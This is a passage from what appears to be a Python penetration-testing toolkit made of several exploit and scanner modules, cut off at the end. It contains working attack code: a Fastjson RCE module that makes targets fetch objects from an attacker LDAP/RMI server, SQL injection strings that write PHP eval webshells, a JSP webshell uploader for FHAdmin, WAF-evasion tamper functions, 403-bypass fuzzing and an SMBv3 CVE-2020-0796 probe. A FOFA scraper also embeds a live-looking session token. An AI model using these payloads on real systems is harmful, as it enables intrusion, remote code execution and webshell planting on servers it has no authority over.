26 | payload = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
27 | desc = 'Windows : CVE_2020_0796'
28 | info = 'WindowsSMBv3协议漏洞'
29 | #输出类
30 | output = Output(pocname)
31 | #请求类
32 | exprequest = ExpRequest(pocname, output)
33 |
34 | try:
35 | sock = socket.socket(socket.AF_INET)
36 | sock.settimeout(3)
37 | ip = socket.gethostbyname(self.url)
38 | sock.connect((ip, 445))
39 | sock.send(payload)
40 | nb, = struct.unpack(">I", sock.recv(4))
41 | res = sock.recv(nb)
42 | if (not res[68:70] == b"\x11\x03") or (not res[70:72] == b"\x02\x00"):
43 | output.fail()
44 | else:
45 | info = "{}存在WindowsSMBv3协议漏洞(CVE-2020-0796), IP值:{}".format(self.url,ip)
46 | output.echo_success(method, info)
47 | self.status = 'success'
48 | except Exception as error:
49 | output.error_output(str(error))
50 |
51 | def check(**kwargs):
52 | result_list = []
53 | result_list.append('----------------------------')
54 | ExpWindowsSMBv3 = WindowsSMBv3(**kwargs)
55 | if kwargs['pocname'] != 'ALL':
56 | func = getattr(ExpWindowsSMBv3, kwargs['pocname'])#返回对象函数属性值,可以直接调用
57 | func()#调用函数
58 | return ExpWindowsSMBv3.status
59 | else:#调用所有函数
60 | for func in dir(WindowsSMBv3):
61 | if not func.startswith("__"):
62 | methodcaller(func)(ExpWindowsSMBv3)
63 | result_list.append(func+' -> '+ExpWindowsSMBv3.status)
64 | ExpWindowsSMBv3.status = 'fail'
65 | result_list.append('----------------------------')
66 | return '\n'.join(result_list)
67 |
68 |
--------------------------------------------------------------------------------
/EXP/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/EXP/__init__.py
--------------------------------------------------------------------------------
/POC/ByPass403.py:
--------------------------------------------------------------------------------
1 | from ClassCongregation import color
2 | import requests
3 | import urllib3
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5 |
6 | Trust_Domain = ['www.baidu.com','www.google.com','home.firefoxchina.cn','www.zhihu.com','www.csdn.net','www.weibo.com']
7 | Trust_Original = ['/admin','/console']
8 | Trust_Referer = ['http://www.baidu.com']
9 | Trust_Proxy = ['127.0.0.1', '114.114.114.114']
10 | Trust_Extend = ['/', '//', '/*', '/*/', '/.', '/./', '/./.', '?', '??', '???', '..;/', '/..;/', '%20/', '%09/']
11 |
12 | org_headers = {
13 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
14 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
15 | 'Accept-Language': 'en-US, en;q=0.5',
16 | 'Accept-Encoding': 'gzip, deflate',
17 | 'Connection': 'close',
18 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1',
19 | }
20 |
21 | proxies = {
22 | "http": "http://127.0.0.1:8080",
23 | "https": "http://127.0.0.1:8080",
24 | }
25 | TIMEOUT = 2
26 | def Change_Host(url, TIMEOUT=TIMEOUT):
27 | for i in Trust_Domain:
28 | headers = {
29 | 'Host': '%s'%i,
30 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
31 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
32 | 'Accept-Language': 'en-US, en;q=0.5',
33 | 'Accept-Encoding': 'gzip, deflate',
34 | 'Connection': 'close',
35 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1'
36 | }
37 | try:
38 | resp_code = requests.get(url=url, headers=headers,
39 | timeout=TIMEOUT,
40 | allow_redirects=False,
41 | verify = False).status_code
42 | if resp_code == 200:
43 | color('[+] Host: %s %s'%(i, resp_code), 'green')
44 | elif resp_code != 403:
45 | color('[?] Host: %s %s'%(i, resp_code), 'blue')
46 | else:
47 | color('[-] Host: %s %s'%(i, resp_code), 'red')
48 | except Exception as error:
49 | color('[-] Host: %s done!'%i, 'red')
50 | continue
51 |
52 | def Add_Original(url, TIMEOUT=TIMEOUT):
53 | for i in Trust_Original:
54 | Add_headers = {
55 | 'X-Original-URL': i,
56 | 'X-Rewrite-URL': i
57 | }
58 | headers = {**org_headers, **Add_headers}
59 | try:
60 | resp_code = requests.get(url=url, headers=headers,
61 | timeout=TIMEOUT,
62 | allow_redirects=False,
63 | #proxies=proxies,
64 | verify = False).status_code
65 | if resp_code == 200:
66 | color('[+] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'green')
67 | elif resp_code != 403:
68 | color('[?] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'blue')
69 | else:
70 | color('[-] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'red')
71 | except Exception as error:
72 | color('[-] X-Original-URL/X-Rewrite-URL: %s done!'%(i), 'red')
73 | continue
74 |
75 | def Add_Referer(url, TIMEOUT=TIMEOUT):
76 | for i in Trust_Referer:
77 | Add_headers = {
78 | 'Referer': i
79 | }
80 | headers = {**org_headers, **Add_headers}
81 | try:
82 | resp_code = requests.get(url=url, headers=headers,
83 | timeout=TIMEOUT,
84 | allow_redirects=False,
85 | verify = False).status_code
86 | if resp_code == 200:
87 | color('[+] Referer: %s %s'%(i, resp_code), 'green')
88 | elif resp_code != 403:
89 | color('[?] Referer: %s %s'%(i, resp_code), 'blue')
90 | else:
91 | color('[-] Referer: %s %s'%(i, resp_code), 'red')
92 | except Exception as error:
93 | color('[-] Referer: %s done!'%(i), 'red')
94 | continue
95 |
96 | def Add_Proxy(url, TIMEOUT=TIMEOUT):
97 | for Trust_IP in Trust_Proxy:
98 | Add_headers = {
99 | 'X-Originating-IP': Trust_IP,
100 | 'X-Remote-IP': Trust_IP,
101 | 'X-Client-IP': Trust_IP,
102 | 'X-Forwarded-For': Trust_IP,
103 | 'X-Forwared-Host': Trust_IP,
104 | 'X-Host': Trust_IP,
105 | 'X-Custom-IP-Authorization': Trust_IP
106 | }
107 | headers = {**org_headers, **Add_headers}
108 | try:
109 | resp_code = requests.get(url=url, headers=headers,
110 | timeout=TIMEOUT,
111 | allow_redirects=False,
112 | verify = False).status_code
113 | if resp_code == 200:
114 | color('[+] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'green')
115 | elif resp_code != 403:
116 | color('[?] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'blue')
117 | else:
118 | color('[-] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'red')
119 | except Exception as error:
120 | color('[-] X-Forwarded-For: %s done!'%(Trust_IP), 'red')
121 | continue
122 |
123 | def Add_Extend(url, TIMEOUT=TIMEOUT):
124 | for i in Trust_Extend:
125 | url_new = url + i
126 | try:
127 | resp_code = requests.get(url=url_new, headers=org_headers,
128 | timeout=TIMEOUT,
129 | allow_redirects=False,
130 | verify = False).status_code
131 | if resp_code == 200:
132 | color('[+] url: %s %s'%(url_new, resp_code), 'green')
133 | elif resp_code != 403:
134 | color('[?] url: %s %s'%(url_new, resp_code), 'blue')
135 | else:
136 | color('[-] url: %s %s'%(url_new, resp_code), 'red')
137 | except Exception as error:
138 | color('[-] url: %s done!'%(url_new), 'red')
139 | continue
140 | finally:
141 | url_new = None
142 |
143 | def check(**kwargs):
144 | url = kwargs['url']
145 | #url = 'https://moa.cmbc.com.cn/moastatic'
146 | try:
147 | resp_code = requests.get(url=url, headers=org_headers,
148 | timeout=TIMEOUT,
149 | #allow_redirects=False,
150 | verify = False).status_code
151 | if resp_code != 403:
152 | color('[-] Page has not return 403!', 'red')
153 | return
154 | except Exception as error:
155 | color('[-] An error occurred %s'%type(error), 'red')
156 | return
157 | #url = url.strip('/')
158 | color('[*] Scanning target domain %s'%url, 'green')
159 | Change_Host(url)
160 | Add_Original(url)
161 | Add_Referer(url)
162 | Add_Proxy(url)
163 | Add_Extend(url)
164 |
165 | if __name__ == "__main__":
166 | check(**{'url':'https://moa.cmbc.com.cn/moastatic/'})
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
--------------------------------------------------------------------------------
/POC/ByWAF_Mysql.py:
--------------------------------------------------------------------------------
1 | def tamper1(payload):
2 | if payload:
3 | payload=payload.replace(" ","/*!90000aaa*/")
4 | payload=payload.replace("+","/*!90000aaa*/")
5 | payload=payload.replace("and","%26%26")
6 | payload=payload.replace("=","/*!90000aaa*/=/*!90000aaa*/")
7 | payload=payload.replace("union","union/*!90000aaa*/")
8 | payload=payload.replace("#","/*!90000aaa*/%23")
9 | payload=payload.replace("user()","user/*!()*/")
10 | payload=payload.replace("database()","database/*!()*/")
11 | payload=payload.replace("--","/*!90000aaa*/--")
12 | payload=payload.replace("select","/*!90000aaa*/select")
13 | payload=payload.replace("from","/*!90000aaa*//*!90000aaa*/from")
14 | return payload
15 |
16 | def tamper2(payload):
17 | if payload:
18 | payload=payload.replace(" ","%23a%0a")
19 | payload=payload.replace("+","%23a%0a")
20 | payload=payload.replace("order","order%23a%0a")
21 | payload=payload.replace("--","/*!90000aaa*/--")
22 | payload=payload.replace("#","/*!90000aaa*/%23")
23 | payload=payload.replace("and","%26%26")
24 | payload=payload.replace("union","union%23a%0a")
25 | payload=payload.replace("user()","user/*!()*/")
26 | payload=payload.replace("version()","version/*!()*/")
27 | payload=payload.replace("database()","database/*!()*/")
28 | payload=payload.replace("group","group%23a%0a")
29 | payload=payload.replace("select","select%23a%0a")
30 | payload=payload.replace("from","from%23a%0a")
31 | return payload
32 |
33 | print('Mysql混淆,目标处输入语句!')
34 | print('''常用语句:
35 | '+like+substr(1/(case+when+substr(database(),6,1)='N'+then+1+else+0+end),1,1)='a
36 | 1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))
37 | 1'and substr((select database()),1,1)='a
38 | 1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+
39 | 1'union select null,null,0x3c3f70687020406576616c28245f504f53545b76616c75655d293b3f3e into outfile '/var/www/html/1.php'--+
40 | 1' union select 1,2,'<%3fphp+%40eval(%24_POST[shell])%3b%3f>' into outfile '路径'--+
41 | 1' into outfile '路径' fields terminated by '<%3fphp+%40eval(%24_POST[shell])%3b%3f>'--+''')
42 | def check(**kwargs):
43 | payload = kwargs['url']
44 | payload1 = tamper1(payload)
45 | payload2 = tamper2(payload)
46 |
47 | print('语句一: %s'%payload1)
48 | print('语句二: %s'%payload2)
49 |
50 |
51 |
52 |
53 |
54 |
--------------------------------------------------------------------------------
/POC/Editor_vul.py:
--------------------------------------------------------------------------------
1 | from ClassCongregation import color
2 | import requests
3 | import urllib3
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5 |
6 | ueditor_path = ['/ueditor.config.js','/net/controller.ashx?action=catchimage','/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:80/0f3927bc-5f26-11e8-9c2d-fa7ae01bbebc.png']
7 | kindeditor_path = ['/kindeditor-all.min.js','/asp/upload_json.asp?dir=file','/asp.net/upload_json.ashx?dir=file','/jsp/upload_json.jsp?dir=file','/php/upload_json.php?dir=file']
8 | ckfinder_path = ['ckfinder.html','/core/connector/java/connector.java?command=FileUpload&type=files¤tFolder=/&langCode=zh-cn&hash=&response_type=txt']
9 | fckeditor_path = ['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/php/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/']
10 |
11 | org_headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
14 | 'Accept-Language': 'en-US, en;q=0.5',
15 | 'Accept-Encoding': 'gzip, deflate',
16 | 'Connection': 'close',
17 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1',
18 | }
19 |
20 | proxies = {
21 | "http": "http://127.0.0.1:8080",
22 | "https": "http://127.0.0.1:8080",
23 | }
24 | TIMEOUT = 2
25 | def Editor_check(url, editor_path, TIMEOUT=TIMEOUT):
26 | for i in editor_path:
27 | try:
28 | resp = requests.get(url=url + i, headers=org_headers,
29 | timeout=TIMEOUT,
30 | allow_redirects=False,
31 | verify = False)
32 | if resp.status_code == 200 and 'DOCTYPE' not in resp.text:
33 | color('[+] Host: %s %s'%(url + i, resp.status_code), 'green')
34 | print(resp.text[:50])
35 | else:
36 | color('[-] Host: %s %s'%(url + i, resp.status_code), 'red')
37 | except Exception as error:
38 | color('[-] Host: %s done!'%(url + i), 'red')
39 | continue
40 |
41 | def check(**kwargs):
42 | url = kwargs['url'].strip('/')
43 | #url = 'https://moa.cmbc.com.cn/moastatic'
44 | #url = url.strip('/')
45 | color('[*] Scanning target domain %s'%url, 'green')
46 | Editor_check(url,ueditor_path)
47 | Editor_check(url,kindeditor_path)
48 | Editor_check(url,ckfinder_path)
49 | Editor_check(url,fckeditor_path)
50 |
51 | if __name__ == "__main__":
52 | check(**{'url':'***'})
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/POC/FHAdmin.py:
--------------------------------------------------------------------------------
1 | from urllib3 import encode_multipart_formdata
2 | import requests,os,random
3 |
4 | shell_name = 'Caidao_cmd.jsp'
5 |
6 | def post_files(url,header,filename):
7 | data = {}
8 | data['imgFile']= (random_name(6,'.jsp'),open(scriptPath+'\\execScripts\\'+filename,'rb').read())
9 | encode_data = encode_multipart_formdata(data)
10 | data = encode_data[0]
11 | header['Content-Type'] = encode_data[1]
12 | r = requests.post(url, headers=header, data=data, verify=False)
13 | return r.text
14 |
15 | def random_name(index,suffix=''):
16 | h = "abcdefghijklmnopqrstuvwxyz0123456789_"
17 | salt_cookie = ""
18 | for i in range(index):
19 | salt_cookie += random.choice(h)
20 | return salt_cookie+suffix
21 |
22 | scriptPath = os.getcwd()
23 | def check(**kwargs):
24 | shell_path = post_files(kwargs['url']+"/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/",{"cookie":"test"},shell_name)
25 | if requests.get(url=kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip(),verify=False,timeout=5).status_code !=404:
26 | print('[*]上传的shell路径: '+kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip())
27 | else:
28 | print('[-]上传失败: '+shell_path)
29 | if __name__=="__main__":
30 | pass
--------------------------------------------------------------------------------
/POC/FOFA.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from requests.packages import urllib3
3 | urllib3.disable_warnings()
4 | import base64
5 | from lxml import etree
6 |
7 | token = 'eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MzU5NjYsIm1pZCI6MTAwMDI2MDc2LCJ1c2VybmFtZSI6InhreDUxOCIsImV4cCI6MTY0NjMzODk5NywiaXNzIjoicmVmcmVzaCJ9.Aqfrl1A0C-WE_T5ZER2eaylK0SdJfWULS8bbnvqWSjlyFzNubPJjbPCqU9nJdKZwTPPUUXp6WBVw33R_tCVAbg'
8 |
9 | fofa_token = token
10 | refresh_token = token
11 |
12 | headers = {
13 | 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',
14 | }
15 | print('''[*]请登录后使用, fofa查询语法:
16 | +--------------------------+---------------------------------------------+
17 | | 例句 | 用途说明 |
18 | +--------------------------+---------------------------------------------+
19 | | title="beijing" | 从标题中搜索“北京”
20 | | header="elastic" | 从http头中搜索“elastic”
21 | | body="phpcms" | 从html正文中搜索“网络空间测绘”
22 | | domain="qq.com" | 搜索根域名带有qq.com的网站
23 | | icp="ICP-030173号" | 查找备案号为“京ICP证030173号”的网站
24 | | host=".gov.cn" | 从url中搜索”.gov.cn”
25 | | port="6379" | 查找对应“6379”端口的资产
26 | | ip="1.1.1.1" | 从ip中搜索包含“1.1.1.1”的网站
27 | | ip="220.181.111.1/24" | 查询IP为“220.181.111.1”的C网段资产
28 | | protocol="quic" | 查询quic协议资产
29 | | country="CN" | 搜索指定国家(编码)的资产
30 | | app="Microsoft-Exchange" | 搜索Microsoft-Exchange设备
31 | | cert="baidu" | 搜索证书(https或者imaps等)中带有baidu的资产
32 | | status_code="402" | 查询服务器状态为“402”的资产
33 | +--------------------------+---------------------------------------------+
34 | ''')
35 | #获取爬取的页面数量
36 | def pag_num_fun(word):
37 | print("[*]开始获取查询的页面数量...")
38 | #查询词进行baase64编码
39 | s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8')
40 | #查询的url
41 | url = f"https://fofa.info/result?qbase64={s}&page=1&page_size=10"
42 | print("[*]查询地址为:",url)
43 | #获取页面源码
44 | text = requests.get(url=url,headers=headers,verify=False,timeout=20,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text
45 | #获取爬取目标的页面数量
46 | tree = etree.HTML(text)
47 | try:
48 | #pag_num:获取到的页面总数量
49 | pag_num = tree.xpath('//div[@id="__layout"]//div[@class="pagFooter"]/div[@class="el-pagination"]/ul[@class="el-pager"]/li/text()')[-1]
50 | except Exception as error:
51 | print('[-]查询目标无结果,请确认查询语法.详细错误为:%s'%type(error))
52 | #return
53 | #raise Exception("")
54 | print('[*]FOFA爬取页面数量为: '+ pag_num)
55 | return pag_num
56 |
57 | #定义爬取页面ip的函数
58 | def fofa(word, pag_num, num = 5):
59 | index = 0#实际页数
60 | s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8')
61 | ip_list = [] #定义存放所有ip的列表
62 | for i in range(1,num+1):
63 | #获取页面源码
64 | url = f"https://fofa.info/result?page={i}&qbase64={s}"
65 | try:
66 | text = requests.get(url=url,headers=headers,verify=False,timeout=10,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text
67 | except Exception as error:
68 | print("fofa函数中,获取页面源码时发生错误,错误所在地为text变量。详细错误为:%s"%type(error))
69 | continue
70 | tree = etree.HTML(text)
71 | #提取一个页面所有ip地址
72 | try:
73 | r = tree.xpath('//div[@id="__layout"]//div[@class="showListsContainer"]/div[@class="rightListsMain"]//a[@target="_blank"]/@href')
74 | #title = tree.xpath('//div[@class="contentLeft"]/p[1]/text()')
75 | #country = tree.xpath('//div[@class="contentLeft"]/p[3]/a[@class="jumpA"]/text()')
76 | except Exception as error:
77 | print('fofa函数中,提取页面ip地址时发生错误,错误所在地为r变量。详细错误为:%s'%error)
78 | return
79 | if len(r) == 0:
80 | break
81 | for m in range(len(r)):
82 | if "//" in r[m]:
83 | #将ip地址保存到列表中
84 | ip_list.append(r[m])
85 | #ip_list.append(r[m]+' '+ country[m])
86 | #ip_list.append(r[m] +' '+ title[m] +' '+ country[m])
87 | else:
88 | pass
89 | index = index + 1
90 | print(f'[*]第{i}页爬取完毕!')
91 | ip_list_new = list(set(ip_list)) #将ip地址去重,然后进行保存
92 | if int(pag_num) > index:
93 | print('[*]提示: 输入登录后的cookie即可获取更多数据哦!')
94 | print('[+]FOFA收集 %s 页结果如下, 总计 [%s]'%(str(index),len(ip_list_new)))
95 | for url in ip_list_new:
96 | print(url)
97 |
98 | print("用法: 在目标处输入查询语法,需要编辑源码修改refresh_token (普通用户默认查询5页)")
99 | def check(**kwargs):
100 | try:
101 | pag_num = pag_num_fun(kwargs['url'])
102 | fofa(kwargs['url'], pag_num)
103 | except Exception as e:
104 | print(type(e))
105 |
106 | if __name__ == '__main__':
107 | pag_num = pag_num_fun('app=\"Shiro权限管理系统\"')
108 | fofa('app=\"Shiro权限管理系统\"', pag_num)
109 |
110 |
111 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
120 |
121 |
122 |
123 |
124 |
125 |
126 |
127 |
128 |
129 |
130 |
131 |
132 |
133 |
134 |
135 |
136 |
137 |
138 |
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
--------------------------------------------------------------------------------
/POC/Fastjson_RCE.py:
--------------------------------------------------------------------------------
1 | import requests,time,re,sys
2 | ###测试
3 | sys.path.append('../')
4 | from ClassCongregation import Dnslog
5 | #import ClassCongregation
6 | def check(**kwargs):
7 | url = kwargs['url']
8 | #VPSip
9 | Vurl = kwargs['ip']
10 | #VPSport
11 | port = kwargs['port']
12 |
13 | dns_cookie = kwargs['cookie']
14 | head = {
15 | "Content-Type":"application/json",
16 | "User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36"
17 | }
18 |
19 | header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36'}
20 | payload_ldap = {
21 | "1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}",
22 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}",
23 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}",
24 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"ldap://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}"
25 | }
26 |
27 | payload_rmi = {
28 | "1.2.24":"{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}",
29 | "1.2.24_1":"{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +":10086/Object\",\"autoCommit\":true}}",
30 | "1.2.47":"{\"a\":{\"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\":true}}}",
31 | "1.2.24_2":"{\"fybm3i\": {\"\\u0040type\": \"\\x63o\\u006D\\u002Es\\x75n.\\u0072ows\\u0065\\u0074.Jdbc\\x52\\x6F\\u0077\\x53e\\u0074\\u0049m\\x70l\",\"dataSourceName\": \"rmi://"+ Vurl+":"+port +"/Object\",\"autoCommit\": true}}"
32 | }
33 |
34 | payload_other = {
35 | "1":"{\"zeo\":{\"@type\":\"java.net.Inet4Address\",\"val\":\"nnivq5.dnslog.cn\"}}"
36 | }
37 | try:
38 | print('[*]正在利用LDAP测试...')
39 | for poc in payload_ldap:
40 | requests.post(url, headers=head, data=payload_ldap[poc], timeout=15, verify=False)
41 | time.sleep(0.5)
42 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15)
43 |
44 | if 'dnslog' in rep1.text:
45 | print('[+]target is vulnerable')
46 | print('[+]fastjson version:{}'.format(poc))
47 | print('[+]poc:{}'.format(payload_ldap[poc]))
48 | return
49 | time.sleep(0.5)
50 | print('[*]正在利用RMI测试...')
51 | for poc in payload_rmi:
52 | requests.post(url, headers=head, data=payload_rmi[poc], timeout=15, verify=False)
53 | time.sleep(0.5)
54 | rep1 = requests.get('http://dnslog.cn/getrecords.php', cookies={'PHPSESSID': dns_cookie} , headers=header, timeout=15)
55 | if 'dnslog' in rep1.text:
56 | print('[+]target is vulnerable')
57 | print('[+]fastjson version:{}'.format(poc))
58 | print('[+]poc:{}'.format(payload_rmi[poc]))
59 | return
60 | print('[-]target is not vulnerable, or openjdk > 8u102')
61 | except Exception as e:
62 | print("异常对象的内容是%s"%e)
63 |
64 | print("[*]用法:java -cp fastjson_tool.jar fastjson.HLDAPServer 106.12.132.186 10086 \"curl xxx.dnslog.cn\"")
65 | print("[*]用法:cookie中要输入dnslog网站的PHPSESSID")
66 |
67 |
68 | if __name__ == "__main__":
69 | DL=Dnslog()
70 | a = DL.dns_host()
71 | print(a)
72 | if DL.dnslog_cn_dns():
73 | print('good')
74 |
--------------------------------------------------------------------------------
/POC/Fckeditor.py:
--------------------------------------------------------------------------------
1 | import requests,time
2 | from requests.packages import urllib3
3 | from CodeTest import color
4 | urllib3.disable_warnings()
5 |
6 | #敏感信息路径查找
7 | Fck_path_list = ['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/p